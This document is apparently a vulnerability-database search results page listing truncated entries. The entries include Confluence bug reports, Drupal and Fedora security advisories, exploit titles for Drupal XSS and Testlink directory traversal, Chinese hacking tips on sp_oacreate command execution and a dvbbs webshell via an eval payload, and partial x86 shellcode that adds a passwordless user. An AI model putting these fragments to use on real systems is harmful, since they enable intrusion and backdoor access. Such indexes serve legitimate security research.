2213 matches found
autocomplete box in page restrictions finds deleted users, wrong usernames
We recently migrated our user management from JIRA to Crowd, our Confluence instance used to link to JIRA for authentication, and now links to Crowd. We now found that, when editing the restrictions on individual pages, the autocomplete feature in that dialog acts strange: Users that have been...
autocomplete box in page restrictions finds deleted users, wrong usernames
We recently migrated our user management from JIRA to Crowd, our Confluence instance used to link to JIRA for authentication, and now links to Crowd. We now found that, when editing the restrictions on individual pages, the autocomplete feature in that dialog acts strange: Users that have been...
Testlink TestManagement And Execution System Directory Traversal
1.Title :Multiple Directory traversal Vulnerabilites in Testlink Test Management and Execution System. Discovered by: Prashant Khandelwal [email protected] 2.Vulnerability Information Class: Directory Traversal Remotely Exploitable: Yes Locally Exploitable: No 3.Vulnerable packages. Version...
Drupal 6.15 - Multiple Persistent Cross-Site Scripting Vulnerabilities
Drupal 6.15 - Multiple Persistent Cross-Site Scripting Vulnerabilities Exploit Title: 0day Drupal = 6.15 Multiple Permanent XSS Date: 07 01 2009 Author: Emanuele 'emgent' Gentili Software Link: http://ftp.drupal.org/files/projects/drupal-6.15.tar.gz Version: Drupal = 6.15 CVE : N/A Code :...
0day Drupal <= 6.15 Multiple Permanent XSS
Exploit for unknown platform in category web applications ========================================== 0day Drupal = 6.15 Multiple Permanent XSS ========================================== Exploit Title: 0day Drupal = 6.15 Multiple Permanent XSS Date: 07 01 2009 Author: Emanuele 'emgent' Gentili...
Drupal 6.15 - Multiple Persistent Cross-Site Scripting Vulnerabilities
Exploit Title: 0day Drupal = 6.15 Multiple Permanent XSS Date: 07 01 2009 Author: Emanuele 'emgent' Gentili Software Link: http://ftp.drupal.org/files/projects/drupal-6.15.tar.gz Version: Drupal = 6.15 CVE : N/A Code : http://www.backtrack.it/emgent/exploits/DrupalMultiplePermanentXss-20090107.tx...
No xp_cmdshell to mention the right-vulnerability warning-the black bar safety net
Author: charley008 from: evil octal With sa, but without xpcmdshell, how to restore showing error. As is xxxx. cpp shucks error. Or cannot find the specified module, but I encountered so many times. With exec spoacreate 'wscript. shell'there is no way the case.. This method can be used Many serve...
SA-CONTRIB-2009-084 - LDAP Integration - Multiple Vulnerabilities
The LDAP Integration module enables users to authenticate against LDAP servers. The module does not properly implement confirmation pages for the LDAP server activation/deactivation which could lead to a Cross Site Request Forgery CSRF attack. The user defined server name is not properly escaped ...
Fedora Core 11 FEDORA-2009-8101 (sssd)
The remote host is missing an update to sssd announced via advisory FEDORA-2009-8101. Note: This VT has been deprecated and is therefore no longer functional. SPDX-FileCopyrightText: 2009 E-Soft Inc. Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the...
XSS in user links
A user with username "alert"foo" that is linked to via \username markup results in script being executed. Curiously, viewing the space homepage of that user results in a blank page. This of course is prevented for public signup, but if the user gets created via other means, i.e. external user...
XSS in user links
A user with username "alert"foo" that is linked to via \username markup results in script being executed. Curiously, viewing the space homepage of that user results in a blank page. This of course is prevented for public signup, but if the user gets created via other means, i.e. external user...
XSS in user links
A user with username "alert"foo" that is linked to via \username markup results in script being executed. Curiously, viewing the space homepage of that user results in a blank page. This of course is prevented for public signup, but if the user gets created via other means, i.e. external user...
dvbbs delete the upload. inc after the shell was a method-vulnerability warning-the black bar safety net
dvbbs delete the upload. inc after the shell was a method - the premise is to give the front Desk administrative privileges Into the background after Go to the user management Just change the personal e-mail address for %eval requestchr3 5%@163.com After saving Find the mail list export Then expo...
SA-CONTRIB-2009-026 - LoginToboggan - Access bypass
LoginToboggan includes a setting which, if enabled, allows users to log in using either their username or e-mail address. In some circumstances, previously blocked users may still be able to access the site if this setting is enabled. Versions affected LoginToboggan 6.x-1.x prior to 6.x-1.5...
[SECURITY] Fedora 10 Update: prewikka-0.9.14-2.fc10
Prewikka is a graphical front-end analysis console for the Prelude Hybrid IDS Framework. Providing numerous features, Prewikka facilitates the work of users and analysts. It provides alert aggregation and sensor and hearbeat views, and has user management and configurable filters. It has access t...
[SECURITY] Fedora 9 Update: prewikka-0.9.14-2.fc9
Prewikka is a graphical front-end analysis console for the Prelude Hybrid IDS Framework. Providing numerous features, Prewikka facilitates the work of users and analysts. It provides alert aggregation and sensor and hearbeat views, and has user management and configurable filters. It has access t...
Partial space admin permission/authority
panel:bgColor=e7f4fa NOTE: This suggestion is for Confluence Server. Using Confluence Cloud? See the corresponding suggestion|http://jira.atlassian.com/browse/CONFCLOUD-15172. panel I followed these guidelines, but this is not fine grained enough...
Frog CMS 0.9.4 Traversal / XSS
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Security Evaluation of Frog CMS Version tested: 0.9.4 by Justin C. Klein Keane This advisory is also posted at http://www.madirish.net/vulnerabilities/frog-cms Frog CMS http://www.madebyfrog.com/ is a lightweight content management system written in P...
Linux/x86 - adds user 'xtz' without password to /etc/passwd - 59 bytes
No description provided by source. / linux/x86 adds user 'xtz' without password to /etc/passwd - 59 bytes - izik [email protected] / char shellcode = "\x6a\x05" // push $0x5 // // exit: // "\x58" // pop %eax "\x99" // cltd "\x31\xc9" // xor %ecx,%ecx "\x66\xb9\x01\x04" // mov $0x401,%cx "\x52" // pu...
Establish a remote connection for the root user-bug warning-the black bar safety net
The following statement has the ROOT user the same permissions. Everyone in the holding station should come across. the root user of mysql, you can only locally connected, the external refuse the connection. The following methods can help you solve this problem, the following statements function...